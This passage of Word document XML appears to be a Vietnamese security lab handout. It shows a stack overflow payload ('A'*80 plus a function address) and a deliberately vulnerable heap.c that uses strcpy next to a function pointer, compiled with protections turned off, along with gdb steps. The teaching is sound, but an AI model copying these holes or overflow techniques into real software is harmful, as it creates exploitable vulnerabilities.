    <w:p w14:paraId="28247F03" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FCE6599" wp14:editId="71BDFE33">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15064143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5841" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="349"/>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2B7801" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Thực hiện các lệnh này để tháo rời hàm winner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>disassemble winner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA76F4B" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FDECB5" wp14:editId="581326A2">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17094953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5B2D" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F679967" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="9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Tương tự tệp khai thác cuối cùng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474C5E9" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="33" w:line="27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Sửa đổi tệp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED925AE" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="1" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="2880" w:right="3058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#!/usr/bin/python #0x080484cb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B875A3A" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr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lastRenderedPageBreak/>
        <w:t>print 'A' * 80 + '\xcb\x84\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D50FE" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="1" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="2875" w:right="4799" w:hanging="253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>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Gỡ lỗi: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb -q ./ED205 run $(./h4) info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0838E5A9" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78AEB20E" wp14:editId="0E832445">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1962578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3F84" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="625"/>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F451865" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. Thực hiện hướng dẫn </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8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ED 205.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>không bắt buộc, sinh viên sẽ 25% điểm thưởng cho bài thực hành nếu hoàn thành</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577EF494" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr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>Câu 4: Khai thác lỗi Heap-based Buffer Overflow trên Linux 64 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C79ACF4" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:ind w:left="108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>4.1. Soạn thảo 1 chương trình heap.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ECE8A8" w14:textId="47FAFCA4" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="5" w:line="269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Tạo thư mục heapoverflow và di chuyển vào đó bằng lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mkdir heapoverflow &amp;&amp; cd heapoverflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A62A9A" w14:textId="1F66DB62" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="5" w:line="269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Tạo chương trình: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nano heap.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD5148" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E3EA09" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="5" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="34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31" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10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282"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w14:paraId="18D3192B" w14:textId="77777777" w:rsidTr="00BB4DA8">
        <w:trPr>
          <w:trHeight w:val="4532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61B8F" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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EF6155"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>#include &lt;stdlib.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EAC27F3" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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EF6155"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#include &lt;unistd.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D855770" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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EF6155"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#include &lt;string.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F784C71" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D">
            <w:pPr>
              <w:spacing w:after="290" w:line="273" w:lineRule="auto"/>
              <w:ind w:right="6734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EF6155"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#include &lt;stdio.h&gt; #include &lt;sys/types.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15193BFB" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D">
            <w:pPr>
              <w:spacing w:after="290" w:line="273" w:lineRule="auto"/>
              <w:ind w:right="6135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struct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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>data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{</w:t>
            </w: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char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name[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>64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];}; </w:t>
            </w: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struct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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>fun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{</w:t>
            </w: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int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(*fp)();};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="041ED71E" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D">
            <w:pPr>
              <w:spacing w:line="273" w:lineRule="auto"/>
              <w:ind w:right="3386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void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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>winner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>()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{     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>printf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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="48B685"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>"Level up. Welcome to Heap-based buffer overflow\n"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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E2F3F97" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D">
            <w:pPr>
              <w:spacing w:after="30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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A74557" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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void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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>nowinner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>()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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1C115E" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E147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   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>printf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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="48B685"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>"Level has not been passed\n"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);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w14:paraId="35D4D355" w14:textId="77777777" w:rsidTr="00BB4DA8">
        <w:trPr>
          <w:trHeight w:val="4280"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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94E2D" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D">
            <w:pPr>
              <w:spacing w:after="30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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B90018" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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int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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>main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>(</w:t>
            </w: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int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 xml:space="preserve"> argc, </w:t>
            </w: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char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 xml:space="preserve"> **argv)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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59457A59" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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   </w:t>
            </w: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struct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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>data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*</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>d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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59739C2C" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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   </w:t>
            </w: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struct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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>fun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*</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FEC418"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>f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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433B16C8" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE5C57B" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D">
            <w:pPr>
              <w:spacing w:after="290" w:line="273" w:lineRule="auto"/>
              <w:ind w:right="611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   d = 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>malloc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(</w:t>
            </w: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sizeof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(struct data));     f = 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>malloc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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="815BA4"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sizeof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(struct fun));     f-&gt;fp = nowinner;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D5DCD2" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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   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>printf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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="48B685"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>"data is at %p, fp is at %p\n"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, d, f);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="188535AA" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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   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>strcpy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(d-&gt;name, argv[</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB4DA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="F99B15"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w: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]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49687846" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E1475D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 xml:space="preserve">    f-&gt;fp();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47DAF424" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00E147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8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F424C"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40BC3DF1" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr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4.2. Biên dịch chương trình </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heap.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D1805" w14:textId="02BB08B5" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="141"/>
        <w:ind w:left="82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>gcc -g -fno-stack-protector -z execstack heap.c -o heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F20CE" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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>Đoạn kiểm tra: ./heap Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA4007" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52154681" wp14:editId="19F6947B">
            <wp:extent cx="6005195" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2044957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0112" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="47" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="96"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1230CFAE" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="294"/>
        <w:ind w:left="108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4.3. Tìm địa chỉ bắt đầu của Heap, địa chỉ của name[64] và fp trên bộ nhớ Heap, địa chỉ của 2 hàm winner và nowinner. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C0C44" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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Vào môi trường (gdb) để debug chương trình: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$gdb -q heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F8688" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing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E32D7F" wp14:editId="0C55161D">
            <wp:extent cx="5953956" cy="2143424"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="31688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01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1D18" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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Liệt kê nội dung mã nguồn của chương trình heap: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(gdb)list 1,30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E0E24" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="337" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="816" w:right="-719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E1A1F" wp14:editId="647CEAF4">
            <wp:extent cx="5943599" cy="4627880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1668" name="Picture 1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Picture 166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4E8C" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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Đặt điểm dừng breakpoint tại dòng 29: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(gdb)break 29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF3809" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="338" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="816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E8EB9" wp14:editId="0BC62142">
            <wp:extent cx="3714750" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1672" name="Picture 1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" name="Picture 167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8FAE" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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>Truyền tham số vào chương trình: (gdb)run AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865DAF4" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="816" w:right="-629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6907B" wp14:editId="70119EAA">
            <wp:extent cx="5886449" cy="1476375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1675" name="Picture 1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" name="Picture 167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86449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AD30" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
